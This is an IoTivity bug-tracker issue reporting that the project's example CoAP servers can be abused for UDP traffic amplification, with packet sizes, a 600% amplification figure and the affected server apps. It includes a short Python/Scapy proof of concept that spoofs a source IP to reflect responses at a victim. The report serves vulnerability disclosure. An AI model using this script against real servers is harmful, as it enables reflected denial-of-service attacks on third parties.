Uploaded image for project: 'IoTivity'
  1. IoTivity
  2. IOT-3267

Traffic amplification of UDP packets

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Reopened
    • Priority: P2
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Primitive Service
    • Labels:
      None
    • Found in Version/s:
      Current (HEAD-5349dad)
    • Issue Severity:
      Major
    • Reproducibility:
      Always (100%)
    • Bugzilla ID:
      None

      Description

      IoTivity server in current version (HEAD-5349dad taken from github) can be used to perform Distributed Denial of Service attacks acting as network amplifier with spoofing of the source IP address.

      After receiving CoAP GET message (53 bytes long) IoTivity server responds with 6 CoAP packets (each 62 bytes long)

      ###[ CoAP ]###
      ver = 1L
      type = CON
      tkl = 0L
      code = 4.01 Unauthorized
      msg_id = 1881
      token = ''
      options = [('Uri-Path', 'test')]
      paymark = ''
      ------------------------------------

      Together all response packets are 372 bytes, which gives 600% amplification factor (calculated as: size_of_output/size_of_input - 1).
      Server responds to IP address from first packet without getting any concurrent response from client, so this request can be used for Distributed Denial of Service with spoofing source IP address.

      Issue was tested and was reproduced for following examples IoTivity server applications:

      • devicediscoveryserver
      • fridgeserver
      • garageserver
      • groupserver
      • lightserver
      • presenceserver
      • roomserver
      • simpleclientserver
      • simpleserver
      • simpleserverHQ

      Issue can be reproduced using following Python2 script (requires Scapy library and sudo to spoof source IP address):

      ---------------------------------------------------------------------------------------------------

      import sys
      from scapy.all import *

      IOTIVITY_PAYLOAD = "40010759b474657374"
      data = IOTIVITY_PAYLOAD.decode('hex')
      packet = IP(src=sys.argv[1], dst=sys.argv[3])/UDP(sport=int(sys.argv[2]), dport=5683)/Raw(data)
      sr(packet, timeout=5, multi=1)

      ---------------------------------------------------------------------------------------------------

      Execution of the script:

      sudo python iotivity_test.py src_ip src_port dst_ip
      (where: src_ip and src_port are IP and port of spoofed source client
      dst_ip is IP of tested IoTivity server on port 5683)
      e.g.:
      sudo python iotivity_test.py 1.1.1.1 50000 192.168.0.101

      For IoTivity example application started with following command on server with IP=192.168.0.101:
      ./simpleserver

      CoAP responses will be sent to 1.1.1.1:50000.

       

        Attachments

        No reviews matched the request. Check your Options in the drop-down menu of this sections header.

          Activity

            People

            • Assignee:
              avolkov Aleksey Volkov
              Reporter:
              CVEReporting CVE Reporting
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated: